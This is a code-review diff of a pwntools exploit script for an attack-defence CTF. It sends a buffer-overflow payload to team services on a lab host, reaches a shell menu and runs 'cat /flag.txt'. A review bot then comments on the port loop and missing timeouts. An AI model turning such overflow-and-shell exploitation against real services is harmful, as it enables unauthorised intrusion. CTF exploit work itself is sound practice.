|
@ -2,7 +2,7 @@ |
|
|
from pwn import process, remote |
|
|
from pwn import process, remote |
|
|
|
|
|
|
|
|
HOST = "192.168.2.20" |
|
|
HOST = "192.168.2.20" |
|
|
TOTAL_TEAMS = 10 |
|
|
|
|
|
|
|
|
TOTAL_TEAMS = 1 |
|
|
FORMAT = "SlashRootCTF" |
|
|
FORMAT = "SlashRootCTF" |
|
|
|
|
|
|
|
|
|
|
|
|
|
@ -15,7 +15,9 @@ def poc0(host, port): |
|
|
p = remote(host, port) |
|
|
p = remote(host, port) |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
if "young" in p.recvuntil(">"): |
|
|
|
|
|
|
|
|
msg = p.recvuntil(">") |
|
|
|
|
|
# print(msg) |
|
|
|
|
|
if "young" in msg: |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("2") |
|
|
p.sendline("2") |
|
@ -27,7 +29,8 @@ def poc0(host, port): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recv(46) |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
# print flag |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
@ -60,7 +63,7 @@ def poc1(host, port): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recv(46) |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
@ -85,7 +88,7 @@ def poc2(host, port): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recv(46) |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
@ -95,7 +98,7 @@ def poc2(host, port): |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__": |
|
|
if __name__ == "__main__": |
|
|
for i in range(1): |
|
|
|
|
|
|
|
|
for i in range(1, TOTAL_TEAMS+1): |
|
|
print poc0(HOST, (60004 + (i*100))) |
|
|
print poc0(HOST, (60004 + (i*100))) |
|
|
print poc1(HOST, (60004 + (i*100))) |
|
|
print poc1(HOST, (60004 + (i*100))) |
|
|
print poc2(HOST, (60004 + (i*100))) |
|
|
print poc2(HOST, (60004 + (i*100))) |
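Review bot: The loop change in the last hunk shifts the first port that is contacted: the old `for i in range(1)` ran with `i = 0` (port 60004), while `for i in range(1, TOTAL_TEAMS+1)` with `TOTAL_TEAMS = 1` starts at `i = 1` (port 60104). If team numbering is meant to be 1-based, document that next to the constant, e.g. `# team N's service listens on 60004 + N*100; teams are numbered from 1`; otherwise keep `range(TOTAL_TEAMS)`. Separately, the three `flag = p.recvuntil("}")` calls in poc0, poc1 and poc2 (whose bodies start outside the visible hunks) have no timeout, so a service that never prints `}` blocks the whole run. pwntools accepts `p.recvuntil("}", timeout=5)` and returns an empty string on timeout, which the existing `FORMAT in flag` check already treats as a failure. The commented-out `# print(msg)` and `# print flag` lines look like debugging leftovers and could be dropped.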